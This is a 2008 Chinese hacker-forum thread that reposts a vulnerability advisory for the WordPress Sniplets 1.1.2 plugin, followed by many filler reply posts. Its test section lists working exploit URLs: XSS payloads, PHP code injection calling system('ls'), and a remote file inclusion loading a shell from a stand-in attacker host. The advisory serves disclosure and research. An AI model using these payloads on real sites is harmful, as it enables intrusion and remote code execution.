黑客X档案官方论坛 » 骇客新闻 » WordPress Sniplets插件多个输入验证漏洞

algerzixuan 发表于 2008-3-3 19:42

WordPress Sniplets插件多个输入验证漏洞

受影响系统：
WordPress Sniplets 1.1.2
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 27985
WordPress是一款免费的论坛Blog系统。
WordPress的Sniplets插件中存在多个输入验证错误，允许远程攻击者执行跨站脚本攻击、泄露敏感信息或入侵有漏洞的系统。
1) modules/syntax_highlight.php文件中没有正确的验证对libpath参数的输入，可能允许攻击者包含本地或外部资源的任意文件。
2) 在调用eval()之前modules/execute.php文件中没有正确的过滤对text参数的输入，允许攻击者通过提交特制的参数值注入并执行任意PHP代码。
3) view/admin/pager.php文件中没有正确的过滤对page参数的输入便返回给了用户，导致在用户浏览器会话中执行任意HTML和脚本代码。
4) view/sniplets/warning.php、view/sniplets/notice.php、view/sniplets/inset.php和modules/execute.php文件中没有正确的验证对text参数的输入，view/admin/submenu.php文件中没有正确的验证对url参数的输入，便返回给了用户，导致在用户浏览器会话中执行任意HTML和脚本代码。
成功利用这些漏洞要求打开了register_globals。
<*来源：NBBN （[email]nbbn@gmx.net[/email]）

链接：[url]http://secunia.com/advisories/29099/[/url]
http://marc.info/?l=bugtraq&m=120396627514810&w=2
*>
测试方法：
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?
http://www.example.com/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);
建议：
--------------------------------------------------------------------------------
厂商补丁：
WordPress
---------
[size=5][color=red]目前厂商还没有提供补丁或者升级程序，[/color][/size]我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://wordpress.org/

蓝色隐武 发表于 2008-5-17 23:43

创意哦！楼主高人啊 谢

笨笨家属 发表于 2008-5-18 00:56

行，有意义，我顶 谢谢您了

巨商居民 发表于 2008-5-19 02:37

呵呵，看大家评论如何

独步侏罗纪 发表于 2008-5-20 16:18

各人有各人的口味,这年头，各人有各人的口味

独步侏罗纪 发表于 2008-5-20 18:13

顶是一种美德！！
[img]http://www.haha168.com/main_name/pictures/2004001/022.jpg[/img]

独步侏罗纪 发表于 2008-5-22 17:47

顶是一种美德！！
[img]http://www.haha168.com/main_name/pictures/2004001/022.jpg[/img]

独步侏罗纪 发表于 2008-5-22 17:50

顶是一种美德！！
[img]http://www.haha168.com/main_name/pictures/2004001/022.jpg[/img]

笨笨家属 发表于 2008-5-24 11:12

创意哦！楼主高人啊 谢
[img]http://k688.com/sucai/gaoxiao/bbs-huitie1.files/jyw1972.jpg[/img]

空中劫机者 发表于 2008-5-25 00:23

灌到心破碎，也别去怪水，只因为灌水太美，就算流干泪，灌到底，心成灰也无所谓；我埋头灌水，永不知疲惫，哪怕我会一灌不回，即使灌一次，灌两次，灌十次都不后悔……”

沙漠路人 发表于 2008-5-25 00:54

顶起
[img]http://bbs.yinsha.com/upload/forum/10/200509/2005090313012105/20050903130121051.gif[/img]

深夜值班 发表于 2008-5-26 00:26

不错的贴，太喜欢了，大家都顶啊
[img]http://bbsimg.qq.com/2005/01/20/013/258.jpg[/img]

恋恋真言 发表于 2008-5-26 23:59

支持下吧！！！！！！！！！！！！！

临渊羡鱼 发表于 2008-5-27 00:17

楼主好久不见十分思念,来顶一个

江东猛男 发表于 2008-5-27 01:30

顶个~,真是不错 哈哈!

逍遥游神 发表于 2008-5-27 03:08

国际惯例，顶下哈~~~~~
[img]http://upload.cnool.net/files2006/20060826/2006082601110806787.jpg[/img]

江户川新次 发表于 2008-5-27 23:06

的确好帖子,推荐加精华

疾风银翼 发表于 2008-5-27 23:12

好多啊，哈哈，谢谢您

空中劫机者 发表于 2008-5-29 06:27

我是来看看的　．．．．带你们一程

风与不羁 发表于 2008-5-29 07:31

完了,又得被迫留名了

查看完整版本: WordPress Sniplets插件多个输入验证漏洞